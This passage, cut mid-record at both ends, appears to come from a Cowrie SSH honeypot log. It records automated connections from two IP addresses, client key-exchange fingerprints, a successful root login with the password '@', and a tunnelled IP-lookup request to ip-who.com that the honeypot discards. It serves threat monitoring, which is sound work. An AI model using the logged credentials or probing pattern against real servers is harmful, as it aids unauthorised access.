01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:42:34.593676Z","src_ip":"212.227.125.160","session":"8c31ac8f5a51"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:35.435939Z","src_ip":"212.227.235.229","session":"5a2c1084d6da"}
{"eventid":"cowrie.login.success","username":"root","password":"@","message":"login attempt [root/@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:35.539449Z","src_ip":"212.227.125.160","session":"8c31ac8f5a51"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T17:42:35.823846Z","session":"8c31ac8f5a51"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:42:36.099598Z","src_ip":"212.227.125.160","session":"8c31ac8f5a51"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:36.341255Z","src_ip":"212.227.125.160","session":"8c31ac8f5a51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53546,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c3f25e485f7","protocol":"ssh","message":"New connection: 212.227.235.229:53546 (1.2.3.4:22) [session: 6c3f25e485f7]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.113286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.114208Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53598,"dst_ip":"1.2.3.4","dst_port":22,"session":"d52b7d612bcc","protocol":"ssh","message":"New connection: 212.227.235.229:53598 (1.2.3.4:22) [session: d52b7d612bcc]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.115263Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53566,"dst_ip":"1.2.3.4","dst_port":22,"session":"147f84deb372","protocol":"ssh","message":"New connection: 212.227.235.229:53566 (1.2.3.4:22) [session: 147f84deb372]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.117057Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53584,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b7eec3666f9","protocol":"ssh","message":"New connection: 212.227.235.229:53584 (1.2.3.4:22) [session: 5b7eec3666f9]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.117904Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53634,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ca5bc3527ff","protocol":"ssh","message":"New connection: 212.227.235.229:53634 (1.2.3.4:22) [session: 3ca5bc3527ff]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.118935Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53520,"dst_ip":"1.2.3.4","dst_port":22,"session":"028f6e8023d2","protocol":"ssh","message":"New connection: 212.227.235.229:53520 (1.2.3.4:22) [session: 028f6e8023d2]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.119568Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53532,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a6ce3bd4ad0","protocol":"ssh","message":"New connection: 212.227.235.229:53532 (1.2.3.4:22) [session: 2a6ce3bd4ad0]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.120322Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53608,"dst_ip":"1.2.3.4","dst_port":22,"session":"6329d650a758","protocol":"ssh","message":"New connection: 212.227.235.229:53608 (1.2.3.4:22) [session: 6329d650a758]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.121096Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53580,"dst_ip":"1.2.3.4","dst_port":22,"session":"9137ff58763c","protocol":"ssh","message":"New connection: 212.227.235.229:53580 (1.2.3.4:22) [session: 9137ff58763c]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.121835Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53610,"dst_ip":"1.2.3.4","dst_port":22,"session":"e567462e10a0","protocol":"ssh","message":"New connection: 212.227.235.229:53610 (1.2.3.4:22) [session: e567462e10a0]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.122560Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53530,"dst_ip":"1.2.3.4","dst_port":22,"session":"b530836b47a8","protocol":"ssh","message":"New connection: 212.227.235.229:53530 (1.2.3.4:22) [session: b530836b47a8]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.123512Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53646,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef56073f4f78","protocol":"ssh","message":"New connection: 212.227.235.229:53646 (1.2.3.4:22) [session: ef56073f4f78]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.124611Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53524,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e219f0fda44","protocol":"ssh","message":"New connection: 212.227.235.229:53524 (1.2.3.4:22) [session: 0e219f0fda44]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.125680Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53622,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c96c6da19cd","protocol":"ssh","message":"New connection: 212.227.235.229:53622 (1.2.3.4:22) [session: 0c96c6da19cd]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.126542Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53550,"dst_ip":"1.2.3.4","dst_port":22,"session":"d989ad86cb36","protocol":"ssh","message":"New connection: 212.227.235.229:53550 (1.2.3.4:22) [session: d989ad86cb36]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.127682Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53624,"dst_ip":"1.2.3.4","dst_port":22,"session":"d947c8223b05","protocol":"ssh","message":"New connection: 212.227.235.229:53624 (1.2.3.4:22) [session: d947c8223b05]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.128910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.129907Z","src_ip":"212.227.235.229","session":"d52b7d612bcc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.130744Z","src_ip":"212.227.235.229","session":"147f84deb372"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.131610Z","src_ip":"212.227.235.229","session":"5b7eec3666f9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.132374Z","src_ip":"212.227.235.229","session":"3ca5bc3527ff"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.133265Z","src_ip":"212.227.235.229","session":"028f6e8023d2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.134081Z","src_ip":"212.227.235.229","session":"2a6ce3bd4ad0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.134726Z","src_ip":"212.227.235.229","session":"6329d650a758"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.135664Z","src_ip":"212.227.235.229","session":"9137ff58763c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.136473Z","src_ip":"212.227.235.229","session":"e567462e10a0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.137090Z","src_ip":"212.227.235.229","session":"b530836b47a8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.137994Z","src_ip":"212.227.235.229","session":"ef56073f4f78"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.138870Z","src_ip":"212.227.235.229","session":"0e219f0fda44"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.139567Z","src_ip":"212.227.235.229","session":"0c96c6da19cd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.140452Z","src_ip":"212.227.235.229","session":"d989ad86cb36"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.141263Z","src_ip":"212.227.235.229","session":"d947c8223b05"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.203999Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.219402Z","src_ip":"212.227.235.229","session":"d52b7d612bcc"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.221091Z","src_ip":"212.227.235.229","session":"147f84deb372"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.222545Z","src_ip":"212.227.235.229","session":"5b7eec3666f9"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.223967Z","src_ip":"212.227.235.229","session":"3ca5bc3527ff"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.225777Z","src_ip":"212.227.235.229","session":"028f6e8023d2"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.227219Z","src_ip":"212.227.235.229","session":"2a6ce3bd4ad0"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.228578Z","src_ip":"212.227.235.229","session":"6329d650a758"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-e